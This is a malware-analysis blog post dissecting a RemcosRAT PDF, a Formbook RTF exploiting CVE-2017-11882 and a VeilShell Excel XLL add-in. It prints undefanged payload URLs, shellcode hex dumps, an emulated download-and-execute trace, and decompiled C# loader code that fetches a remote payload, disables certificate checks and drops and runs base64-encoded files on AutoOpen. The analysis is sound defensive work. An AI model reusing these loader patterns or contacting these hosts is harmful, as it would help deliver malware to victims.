Analyzing Eight Malicious Documents in a Single Day: Techniques, Tools, and Key Findings

By Vincent DinhMalware

After completing HackTheBox’s Malicious Document Analysis Module, I felt inspired to dive deeper into analyzing malicious documents independently. My goal was to analyze recent samples quickly, within a single day, using documents from MalwareBazaar. During this process, I extracted payloads and Indicators of Compromise (IoCs). In this blog, I dive deep into PDFs, RTFs, and XLL add-ins from the RemcosRAT, Formbook, and VeilShell malware families.

The goal of this analysis was not only to uncover the methods used to embed and conceal malicious content but also to demonstrate the practical application of tools such as Peepdf, rtfdump.py, and Excel DNA.

Environment and Tools

I used the following setup for a controlled and efficient analysis:

  • VM Environment: REMnux for secure malware analysis
  • Windows VM: x64dbg, ExcelDNA, dnSpy, and PE-Bear
  • PDF Analysis: Tools like PDFiD, PDFParser, and Peepdf
  • Office Documents: oletools suite
  • RTF Analysis: rtfdump.py, scdbg, XORSearch
  • File Identification: trid

While most tools were pre-installed in REMnux, I added the plugin_biff.py add-on for advanced Excel file analysis.

Initial Triage and File Identification

Each document analysis began with an identification step using trid.

  • For example:
remnux@remnux:~/Downloads$ trid 9d02bf092fdcf44a51ae6e264ec3e3e57afbe79622c92a797e33fb62ed495cda.docx 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: 9d02bf092fdcf44a51ae6e264ec3e3e57afbe79622c92a797e33fb62ed495cda.docx
 52.2% (.DOCX) Word Microsoft Office Open XML Format document (23500/1/4)
 38.8% (.ZIP) Open Packaging Conventions container (17500/1/4)
  8.8% (.ZIP) ZIP compressed archive (4000/1)bas

PDF Analysis (RemcosRAT)

Remcos Remote Access Trojan (RemcosRAT) is designed to provide full remote control over infected systems. While it is marketed as a legitimate administration tool by its creators, it is frequently abused by cybercriminals for malicious purposes.

I chose RemcosRAT because I had heard of it and it had a signature on Malware Bazaar.

RemcosRAT Sample

trid 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
100.0% (.PDF) Adobe Portable Document Format (5000/1)
  • The sample was verified as a 100% PDF using trid.

PDF-Parser and PDF-ID Analysis

Introduction to the Tools

pdfid.py: Identifies key characteristics of a PDF file, such as the presence of /JavaScript/OpenAction/ObjStm, and other potentially dangerous elements. It also calculates entropy to highlight suspicious embedded content.

pdf-parser.py is a Python-based tool that analyzes the internal structure of PDF files, providing detailed insights into potentially malicious content, objects, and metadata.

Execution of Commands and Results

PDFiD Analysis

  • The following command was used to analyze the sample file and extract key metadata:
  • The -e flag is particularly useful for obtaining entropy values, object types, and associated entries.
remnux@remnux:~/Downloads$ pdfid.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf -e
  • The analysis revealed the following:
PDFiD 0.2.8 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
 PDF Header: %PDF-1.7
 obj                   14
 endobj                14
 stream                12
 endstream             12
 /ObjStm                1
 /AcroForm              1
 /URI                   0
 Total entropy:           7.975268 (36017 bytes)
 Entropy inside streams:  7.985894 (34262 bytes)
 Entropy outside streams: 0.000000 (1755 bytes)
  • Presence of /ObjStm indicates embedded object streams, which are often used to obfuscate malicious content.
  • /AcroForm detected, suggesting embedded interactive forms.
  • No /JavaScript or /OpenAction objects, reducing suspicion of common execution triggers.

PDF-Parser Analysis

The pdf-parser.py tool was then employed to investigate specific objects within the file further:

remnux@remnux:~/Downloads$ pdf-parser.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf

The output focused on objects of interest:

obj 2 0
 Type: /Catalog
 Referencing: 4 0 R, 5 0 R
 <<
   /Type /Catalog
   /Pages 4 0 R
   /AcroForm 5 0 R
 >>

obj 1 0
 Type: /ObjStm
 Referencing: 29 0 R
 Contains stream
 <<
   /Type /ObjStm
   /N 16
   /First 103
   /Filter /FlateDecode
   /Length 29 0 R
 >>

obj 21 0
 Type: /XObject
 Referencing: 24 0 R
 Contains stream
 <<
   /Type /XObject
   /Subtype /Image
   /Width 900
   /Height 1164
   /BitsPerComponent 8
   /ColorSpace /DeviceGray
   /Filter [/FlateDecode /DCTDecode]
   /Length 13634
 >>

obj 30 0
 Type: /XRef
 Referencing: 2 0 R, 3 0 R
 Contains stream
 <<
   /Size 31
   /Root 2 0 R
   /Info 3 0 R
   /ID [<E8B47CAEFEC9840FFA878719DAE58EAF> <E8B47CAEFEC9840FFA878719DAE58EAF>]
   /Type /XRef
   /Filter /FlateDecode
   /Length 100
 >>
  • As of right now, we are primarily concerned with the /AcroForm and /ObjStm. To accomplish this, we can use the ObjStm plugin with pdf-parser.
  • An /URI linking to external content was also detected, warranting further investigation.
  • ObjStm: An object stream in PDFs that contains multiple compressed objects to optimize file size and structure.
  • AcroForm: A PDF structure that enables interactive forms, such as text fields, checkboxes, and buttons, for user input.
remnux@remnux:~/Downloads$ pdf-parser.py 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf --objstm
PDF Comment '%PDF-1.7\n'

obj 15 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 19 0 R, 20 0 R

  <<
    /Helv 19 0 R
    /ZaDb 20 0 R
  >>

obj 16 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 21 0 R, 22 0 R, 23 0 R

  <<
    /X0 21 0 R
    /Im2 22 0 R
    /Im3 23 0 R
  >>

obj 17 0
 Containing /ObjStm: 1 0
 Type: /Action
 Referencing: 

  <<
    /Type /Action
    /S /URI
    /URI (https://2012.filemail.com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326)
  >>

obj 18 0
 Containing /ObjStm: 1 0
 Type: 
 Referencing: 

  <<
    /W 0
  >>
  • /AcroForm (object 2) references object 4, suggesting interactive forms.
  • /ObjStm (object 1) compresses multiple objects, obfuscating their true nature.
  • Object 17 contains a /URI, pointing to an external link likely used to deliver a malicious payload. To evaluate the /AcroForm potential malicious activity, Peepdf was used due to its advanced capabilities in object mapping and interactive analysis.

Peepdf Object Analysis

remnux@remnux:~/Downloads$ peepdf 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf -i 
File: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594.pdf
MD5: 403e27e527baabeb53ef83b99c4cadee
SHA1: 44d2696a0a31ce7c15553bf88e1605e67a4e6545
SHA256: 43987e781d3195cb2d75e0a9acca5de1cbd7eefd2010cce9afd897d5e8c9f594
Size: 36017 bytes
IDs: 
 Version 0: [ <E8B47CAEFEC9840FFA878719DAE58EAF> <E8B47CAEFEC9840FFA878719DAE58EAF> ]

PDF Format Version: 1.7
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 30
Streams: 12
URIs: 1
Comments: 0
Errors: 0

Version 0:
 Catalog: 2
 Info: 3
 Objects (30): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30]
 Compressed objects (16): [3, 4, 5, 6, 7, 8, 14, 15, 16, 17, 18, 19, 20, 24, 25, 27]
 Streams (12): [1, 9, 10, 11, 12, 13, 21, 22, 23, 26, 28, 30]
 Xref streams (1): [30]
 Object streams (1): [1]
 Encoded (12): [1, 9, 10, 11, 12, 13, 21, 22, 23, 26, 28, 30]
 Objects with URIs (1): [17]
 Suspicious elements (1):
  /AcroForm (1): [2]
PPDF> object 2

<< /Type /Catalog
/Pages 4 0 R
/AcroForm 5 0 R >>

PPDF> object 4

<< /Type /Pages
/Kids [ 6 0 R ]
/Count 1 >>

PPDF> object 17

<< /Type /Action
/S /URI
/URI https://2012.filemail.com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326 >>
  • Object 2 (/AcroForm) and object 17 (/URI) were prioritized for further analysis.
  • Initial findings from peepdf -i revealed the /AcroForm object located within object 2, with references to object 4. Upon further analysis, the /AcroForm was determined to be benign. However, object 17, containing the /URI, was examined for additional insight, likely the delivery mechanism for the RemcosRAT payload.

The malicious PDF is crafted to deliver RemcosRAT, a remote access trojan used for full control over infected systems. It exploits embedded /ObjStm objects to conceal their true purpose while bypassing detection mechanisms. Once executed, the document retrieves and downloads the RemcosRAT payload, enabling attackers to gain unauthorized remote access, steal credentials, and monitor the victim's system.

  • IOCs: hxxps[://]2012[.]filemail[.]com/api/file/get?filekey=ytyQUUZwEeijkbLbKoMvyf0YvBoqUg4Fufe6zGM0dPsUyU-wFFP0pUcwI9xAZPaEI-rrsI6M0JRZ03-gDQ&pk_vid=0036e245a09a84ae173430670396c326
VirusTotal Comment

RTF Analysis (Formbook)

What are RTFs?

RTF is primarily a benign document format, it is frequently exploited by attackers due to its ability to embed objects and payloads.

  • RTFs can include OLE objects (e.g., executables or scripts) to deliver malware.
  • Older vulnerabilities like CVE-2017–11882 (Microsoft Equation Editor flaw) are commonly targeted.
  • Shellcode is embedded in RTF objects to exploit software parsing the file.

Formbook is a data-stealing malware known for targeting credentials, keystrokes, and other sensitive information. It’s often spread through malicious documents and uses obfuscation to avoid detection while quietly collecting data from infected systems.

Formbook RTF Sample

  • Threat actors may rename .rtf extensions to .doc to ensure the file opens in Microsoft Word, although in this case, the file remains in the .rtf format.
trid e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf 

TrID/32 - File Identifier v2.24 - (C) 2003-16 By M.Pontello
Definitions found:  18251
Analyzing...

Collecting data from file: e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf
100.0% (.RTF) Rich Text Format (5000/1)

rtfdump and CVE-2017–11882

The tool rtfdump.py is instrumental in analyzing Rich Text Format (RTF) files, breaking them into individual objects for detailed inspection.

  • Let’s check using rtfdump to check the objects present.
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf 
    1 Level  1        c=    2 p=00000000 l=  825268 h=  193697;      18 b=       0   u=  248526 \rtf1
    2  Level  2       c=    0 p=00000008 l=     227 h=       0;       5 b=       0   u=       0 
    3  Level  2       c=    1 p=000000ef l=  825028 h=  193697;      18 b=       0   u=  248526 
    4   Level  3      c=    3 p=00076b73 l=  339007 h=    3722;      18 b=       0   u=     369 \*\objdata878984
    5    Level  4     c=    0 p=00076b84 l=      23 h=       0;       2 b=       0   u=       1 \*\mchr
    6    Level  4     c=    0 p=00076b9f l=     617 h=     200;      18 b=       0   u=     368 \*\xmlattr615232522
    7    Level  4     c=    0 p=00076e0c l=      57 h=       0;       4 b=       0   u=       0 \*\aexpnd615232522
  • In this analysis, object 4 was identified as a match with an object marked as obj on the far right.
  • To further investigate object 4, it was viewed in hexadecimal format using the -s 4 -H flag.
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 -H | more
00000000: 51 D2 FC BE E6 ED 56 D8  B4 DD F0 D7 33 71 E6 BB  Q.....V.....3q..
00000010: 2C 8E 88 B2 B2 C4 ED E9  CA D4 65 FE 1E EA CE E9  ,.........e.....
00000020: 9C BE F3 DB 88 BD ED 2B  AD F1 93 85 62 BA BC F9  .......+....b...
00000030: 62 CB B3 2E D7 E1 2D B7  BC AF BE 8C 9C AC B6 22  b.....-........"
00000040: 1F A5 AD A5 38 B6 21 DE  6B E1 77 CD 23 BA 6E 58  ....8.!.k.w.#.nX
00000050: 4D C3 F7 3E 3F 88 ED 9C  F4 BD ED F2 AE AA 60 F1  M..>?.........`.
00000060: D4 BA AC AE 80 D0 F1 78  02 00 00 00 0B 00 00 00  .......x........
00000070: 45 51 55 61 74 49 4F 4E  2E 33 00 00 00 00 00 00  EQUatION.3......
00000080: 00 00 00 B6 06 00 00 02  7E F7 EB 47 6C 01 05 77  ........~..Gl..w
00000090: 59 ED EC C9 00 00 00 00  00 00 00 00 00 00 00 00  Y...............
000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 50 06 45 00  ............P.E.
000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 29 C3 44 00  ............).D.
000000D0: 00 00 00 E9 4F 01 00 00  BE C9 34 F8 6D 83 8F 96  ....O.....4.m...
000000E0: 3C 38 CA D8 3B 63 9A 73  14 04 6A 3F 3F DA 98 78  <8..;c.s..j??..x
000000F0: 4D AD B2 FE 20 85 C0 96  33 F6 7B 28 CC 4B 90 00  M... ...3.{(.K..
00000100: 4E E1 E0 0E 6B 4C BE 27  6B AF 37 43 67 EB 47 BF  N...kL.'k.7Cg.G.
00000110: 92 E5 1F 99 6A C7 64 B8  0C 42 6F 22 5F C6 8D 43  ....j.d..Bo"_..C
00000120: 66 CA 42 2E 6F 08 7F D5  66 BD F1 51 06 EE 33 1E  f.B.o...f..Q..3.
00000130: 1A 9F 18 5D CA 1A E3 12  CC 30 8F 64 A9 70 08 DF  ...].....0.d.p..
00000140: 01 73 71 B7 C9 13 5E FC  89 AB 18 E7 98 60 DD 17  .sq...^......`..
  • This revealed the keyword EQUatION.3, indicating a link to CVE-2017-11882. This vulnerability is associated with the Microsoft Equation Editor and has been widely exploited in numerous malware samples by embedding shellcode within objects to execute arbitrary code.
Analysis of CVE-2017–11882 Exploit in the Wild
  • format-bytes.py, which breaks down structured binary data for easier interpretation, is used with the Microsoft Equation Editor Format (EQN), where the header often reveals if shellcode or payloads are embedded within the document.
remnux@remnux:~/Downloads$ rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 -H | format-bytes.py -f name=eqn1
 1:   <class 'int'>       3030 size of EQNOLEFILEHDR
 2:   <class 'int'>   30303030 
 3:   <class 'int'>       3030 
 4:   <class 'int'>   3135203a 
 5:   <class 'int'>   20324420 
 6:   <class 'int'>   42204346 
 7:   <class 'int'>   36452045 
 8:   <class 'int'>   20444520 
 9:   <class 'int'>         35 Start MTEF header
10:   <class 'int'>         36 
11:   <class 'int'>         20 
12:   <class 'int'>         44 
13:   <class 'int'>         38 
14:   <class 'int'>         20 Full size record
15:   <class 'int'>         20 Line record
16:   <class 'int'>         42 Font record
17:   <class 'int'>         34 
18:   <class 'int'>         20 
19: <class 'bytes'>         40 DD F0 D7 3 b'44442046302044372033' 3.258695 5f303dc2df13765f98b2dace4620c1cd Shellcode/Command (fontname)
20:   <class 'int'>   30303030 
21:   <class 'int'>   3a303130 
22:   <class 'int'>         20 
23:   <class 'int'>         32 
Remainder: 8910
00000000: 43 20 38 45 20 38 38 20  42 32 20 42 32 20 43 34  C 8E 88 B2 B2 C4
00000010: 20 45 44 20 45 39 20 20  43 41 20 44 34 20 36 35   ED E9  CA D4 65
00000020: 20 46 45 20 31 45 20 45  41 20 43 45 20 45 39 20   FE 1E EA CE E9 
00000030: 20 2C 2E 2E 2E 2E 2E 2E  2E 2E 2E 65 2E 2E 2E 2E   ,.........e....
00000040: 2E 0A 30 30 30 30 30 30  32 30 3A 20 39 43 20 42  ..00000020: 9C B
00000050: 45 20 46 33 20 44 42 20  38 38 20 42 44 20 45 44  E F3 DB 88 BD ED
00000060: 20 32 42 20 20 41 44 20  46 31 20 39 33 20 38 35   2B  AD F1 93 85
00000070: 20 36 32 20 42 41 20 42  43 20 46 39 20 20 2E 2E   62 BA BC F9  ..
00000080: 2E 2E 2E 2E 2E 2B 2E 2E  2E 2E 62 2E 2E 2E 0A 30  .....+....b....0
00000090: 30 30 30 30 30 33 30 3A  20 36 32 20 43 42 20 42  0000030: 62 CB B
000000A0: 33 20 32 45 20 44 37 20  45 31 20 32 44 20 42 37  3 2E D7 E1 2D B7
000000B0: 20 20 42 43 20 41 46 20  42 45 20 38 43 20 39 43    BC AF BE 8C 9C
000000C0: 20 41 43 20 42 36 20 32  32 20 20 62 2E 2E 2E 2E   AC B6 22  b....
000000D0: 2E 2D 2E 2E 2E 2E 2E 2E  2E 2E 22 0A 30 30 30 30  .-........".0000
000000E0: 30 30 34 30 3A 20 31 46  20 41 35 20 41 44 20 41  0040: 1F A5 AD A
000000F0: 35 20 33 38 20 42 36 20  32 31 20 44 45 20 20 36  5 38 B6 21 DE  6

1I: s 67 u 67
2I: sl 8259 ul 8259 sb 17184 ub 17184
4I: sl 1161306179 ul 1161306179 sb 1126185029 ub 1126185029
4F: l 2946.016357 b 160.219803
4N: b 67.32.56.69 l 69.56.32.67
4E: l 2006/10/20 01:02:59 b 2005/09/08 13:10:29
8I: sl 2321667319160905795 ul 2321667319160905795 sb 4836927869340366880 ub 4836927869340366880
8T: ul 8958/01/26 22:51:56.0905795 ub N/A
8F: l 0.000000 b 2282734585912336.000000
16G: b 43203845-2038-3820-4232-204232204334 m {45382043-3820-2038-4232-204232204334}

Once the presence of shellcode was confirmed, the next steps included extracting the shellcode, locating its entry point, and simulating its execution using scdbg.

Dumping the Shellcode

  • Object 4 was selected for analysis using the hexdecode and dump flags to extract its content into a shellcode file.
rtfdump.py e53a57b9be38e41edf2f8cb4161ad6e155bfcb24990b5e1adbf12c8ba675710b.rtf -s 4 --hexdecode --dump > formbookrtf.sc
  • Subsequently, XORSearch was employed with the -W flag, leveraging its built-in rules to identify the entry point within the shellcode file.
remnux@remnux:~/Downloads$ xorsearch -W formbookrtf.sc 
Found XOR 00 position 0000025D: GetEIP method 2 EB09
Found ROT 25 position 0000025D: GetEIP method 2 EB09
Found ROT 24 position 0000025D: GetEIP method 2 EB09
Found ROT 23 position 0000025D: GetEIP method 2 EB09
Score: 260
  • To further examine the shellcode’s behavior, scdbg was utilized with the -foff flag to emulate execution starting at the identified offset (0x25D).
scdbg /f formbookrtf.sc /foff 0x25D
  • The output revealed a series of disassembled Windows API calls, which provide critical insight into the shellcode’s intended functionality:
  • GetProcAddressExpandEnvironmentStringsW: Preps the file path of %APPDATA%\yhndfreshkl89221.exe , which hides the file and has write access.
  • LoadLibraryWURLDownloadToFileW: It loads a system library (urlmon.dll) and uses the URLDownloadToFileW function to download a file from hxxps[://]ftvproclad[.]top/wyfRlocEnjsHiix[.]exe.
  • CreateProcessW: Executes the file.
  • ExitProcess: Shuts down the script.
4014fc GetProcAddress(ExpandEnvironmentStringsW)
40154b ExpandEnvironmentStringsW(%APPDATA%\yhndfreshkl89221.exe, dst=12fb84, sz=104)
401560 LoadLibraryW(UrlMon)
40157b GetProcAddress(URLDownloadToFileW)
4015e3 URLDownloadToFileW(https://ftvproclad.top/wyfRlocEnjsHiix.exe, C:\users\remnux\Application Data\yhndfreshkl89221.exe)
4015fb GetProcAddress(GetStartupInfoW)
401605 GetStartupInfoW(12fda4)
40161c GetProcAddress(CreateProcessW)
401641 CreateProcessW( , C:\users\remnux\Application Data\yhndfreshkl89221.exe ) = 0x1269
401655 GetProcAddress(ExitProcess)
401659 ExitProcess(0)

The RTF document exploits CVE-2017–11882, a vulnerability in Microsoft Equation Editor, to execute the shellcode embedded within the file. The shellcode retrieves and executes additional payloads, enabling the attacker to install Formbook, a credential-stealing malware. Formbook captures sensitive data, such as keystrokes and credentials, while maintaining persistence through obfuscation.

IOCs: hxxps[://]ftvproclad[.]top/wyfRlocEnjsHiix[.]exe

SHA256: 99544c011500dbc38b972fc49587047eb94ecfba56985fd3c9f59dd684dbf97b

xll Analysis (VeilShell)

VeilShell XLL Sample

What are XLLs?

XLL add-ins are specialized DLLs designed exclusively for Microsoft Excel. While less common than malicious macros or documents, XLLs possess unique capabilities that make them attractive to attackers:

  • Bypass Macro Restrictions: XLLs are not subject to Excel’s macro security settings.
  • Evasion of Security Tools: XLLs can bypass detection mechanisms more effectively than traditional macros.
  • Platform-Specific Complexity: Unlike VBA macros, which work across Word and Excel, XLLs are exclusive to Excel and inherently more complex.
Pop-up asking for the user to enable the add-in
  • When loaded, XLL files prompt users to enable the add-in. This process often occurs with fewer warnings compared to VBA macros, making XLLs particularly dangerous as they execute with minimal user intervention.

xlAutoOpen export

An analysis of multiple .xll samples from Malware Bazaar reveals that the xlAutoOpen export is a consistent feature in both legitimate and malicious XLLs. As this function is automatically executed when an XLL is loaded, attackers use it as an entry point to embed malicious code, enabling activities such as shellcode decryption or malware downloads.

x64dbg analysis of the xlAutoOpen Export

Initial Inspection (PE-BEAR)

The initial inspection using PE-BEAR revealed that XLLs, often developed in C/C++ or C#, can extend Excel’s functionality through frameworks like Excel DNA. A significant number of malicious XLLs leverage this framework for advanced functionality, necessitating further analysis using ExcelDNA-Unpack.

ExcelDNA and ExcelDNA-Unpack

ExcelDNA-Unpack is a tool designed to extract the contents of Excel add-ins (XLL files) created with the Excel DNA framework.

C:\Users\vboxuser\Downloads\exceldna-unpack-2.1.0-win7-x64\exceldna-unpack.exe -xllFile=C:\Users\vboxuser\Documents\7e9f91f0cfe3769df30608a88091ee19bc4cf52e8136157e4e0a5b6530d510ec.xll
Excel-DNA Unpack Tool, version 2.1.0+60b3d6031babfd276f540b95f9fb298c18342a00

Analyzing 7e9f91f0cfe3769df30608a88091ee19bc4cf52e8136157e4e0a5b6530d510ec.xll . . . OK

Extracting EXCELDNA.LOADER.dll (ASSEMBLY) . . . OK
Extracting EXCELDNA.INTEGRATION.dll (ASSEMBLY_LZMA) . . . OK
Extracting EXCELDNAPROJECTDEMO.dll (ASSEMBLY_LZMA) . . . OK
Extracting __MAIN__.dna (DNA) . . . OK
__MAIN__.dna can be opened in any text editor to view the packed file.
  • The extracted components include critical elements like the loader (EXCELDNA.LOADER.dll), integration libraries, and a project-specific DLL, all of which can be reverse-engineered for deeper analysis.
  • Once unpacked, the file specified in the ExternalLibrary Path in the MAIN file must be opened in dnSpy — a .NET decompiler, and debugger used to analyze compiled .NET applications.

Examining Excel DNA in dnSpy

The extracted ExcelDnaProjectDemo.dll was loaded into dnSpy, a .NET decompiler, for detailed inspection.

  • Upon loading the file, the presence of an HttpWebRequest immediately stands out, indicating communication with a file-sharing platform.
  • Before initiating the request, the code enforces the use of TLS 1.2 for secure content retrieval from jumpshare.com. This ensures compatibility with servers requiring modern security protocols and retrieves the content as a UTF-8 encoded string.
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
  • With the secure connection, WebRequest.Create() initializes a new web request to the URL and a GET request below it.
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://jumpshare.com/viewer/load/kFEPlgWBGfeyXVXCxD3u");

httpWebRequest.Method = "GET";
  • The use of a misleading UserAgent string, imitating an outdated Internet Explorer browser, ensures the request bypasses some web application firewalls and bot-detection systems.
httpWebRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MSIE/11.0; rv:11.0;) like Gecko";
  • This line overrides SSL certification validation, bypassing errors, and accepts all certificates, allowing the program to connect to malicious servers.
httpWebRequest.ServerCertificateValidationCallback = ((object _s, X509Certificate _x509s, X509Chain _x509c, SslPolicyErrors _ssl) => true);

Decryption and Execution

Decrypts a Base64 encoded DES encrypted string using a predefined key and IV and returns as plain text.
  • The decryption process starts with a Base64-encoded DES-encrypted string that uses a predefined key and initialization vector (IV).
  • The encrypted text is initially encoded in Base64, with spaces in the textToDecrypt replaced by + symbols before decoding the Base64 string into a byte array.

The decryption process begins by creating a DESCryptoServiceProvider object:

using (DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider())

MemoryStream is then set up to store the decrypted output:

MemoryStream memoryStream = new MemoryStream();

Next, a CryptoStream is initialized to handle the decryption process using the DES key (rgbKey) and IV (rgbIV), which have been previously converted into byte arrays:

CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(rgbKey, rgbIV), CryptoStreamMode.Write);

The Base64 decoded encrypted byte array is written to CryptoStream :

cryptoStream.Write(array, 0, array.Length);

Finally, the decryption is completed, and the data is pushed into the MemoryStream:

cryptoStream.FlushFinalBlock();

The decrypted bytes in the MemoryStream are then converted into a UTF-8 string:

text = Encoding.UTF8.GetString(memoryStream.ToArray());

The decrypted plaintext could serve as executable code, configuration data, or other instructions. However, because the site (jumpshare.com) hosting the payload is now offline, the exact response remains unknown.

Execution of Malicious Content

  • With the payload decrypted, the next phase focuses on executing the malicious content and analyzing its behavior.
  • Once the decryption process is complete, the code retrieves additional malicious content from a remote server and executes it.
  • The code retrieves a response from jumpshare.com, containing what appears to be an encrypted payload designed for further decryption and execution. This payload is passed to a method that isolates the encrypted portion and decrypts it using a DES key and initialization vector (IV), converting the Base64 string into plaintext.

The decrypted payload initiates further actions, such as:

  • Writing multiple Base64-encoded files to disk.
  • Executing the dropped payloads.

AutoOpen Method Analysis

  • The AutoOpen method serves as the automation mechanism for loading and executing malicious content embedded within the XLL file.
public void AutoOpen()
  {
   try
   {
    if (File.Exists(test.excel_path))
    {
     new Thread(new ThreadStart(this.Thread1)).Start();
    }
    else
    {
     File.WriteAllBytes(test.excel_path, System.Convert.FromBase64String(test.excel_base64));
     File.WriteAllBytes(test.exePath, System.Convert.FromBase64String(test.exe_base64));
     File.WriteAllBytes(test.configPath, System.Convert.FromBase64String(test.config_base64));
     File.WriteAllBytes(test.DllPath, System.Convert.FromBase64String(test.Dll_base64));
     this.Get();
     new Thread(new ThreadStart(this.Thread1)).Start();
    }
   }
   catch (Exception)
   {
   }
  }
  • This design ensures the payload is triggered every time the XLL is loaded, establishing persistence on the target system.

The program checks for test.excel_path :

  • If it exists, it starts a new thread to launch the file
  • If it doesn’t exist, then writes multiple files to disk using base64 encoded data, executes the payload with Get() , launches the Thread1 to execute the file.

Decryption Behavior

  • Retrieves malicious JS, decrypts, and executes it — evading detection.
  • Writes and decodes files to obfuscate content and avoid immediate suspicion.
  • Ensures persistence by executing the malicious process every time the program is launched.
  • Uses Base64 encoding and dynamic execution to bypass antivirus/EDR.
  • Runs the payload on separate threads to maintain stealth and avoid blocking the main program.

Observed Behavior

  • Persistence: The xlAutoOpen method ensures automatic execution whenever the XLL is loaded, making the attack self-replicating and difficult to remove without deeper investigation.
  • Evasion: Base64 encoding, combined with dynamic decryption and execution, obfuscates the malicious content. SSL validation bypass and misleading User-Agent strings help circumvent antivirus/EDR solutions and web application firewalls.
  • File Writing: The code writes multiple Base64-encoded files to disk, further obfuscating malicious intent while preparing payloads for execution.
  • Payload Execution: Encrypted scripts retrieved from remote servers are decrypted and executed. These actions enable attackers to install additional malware components or initiate further malicious activities.

Conclusion

  • Leveraging tools like ExcelDNA-Unpack to extract their components and dnSpy to reverse-engineer their underlying code, we uncovered how attackers embed malicious behavior, such as downloading additional payloads or executing obfuscated scripts. The consistent presence of xlAutoOpen as an entry point underscores its importance in XLL-based attacks. To mitigate these threats, organizations should closely monitor the use of XLL add-ins and restrict the use of external add-ins.

IOCs: hxxps[://]jumpshare[.]com/viewer/load/kFEPlgWBGfeyXVXCxD3u

← Back to Blog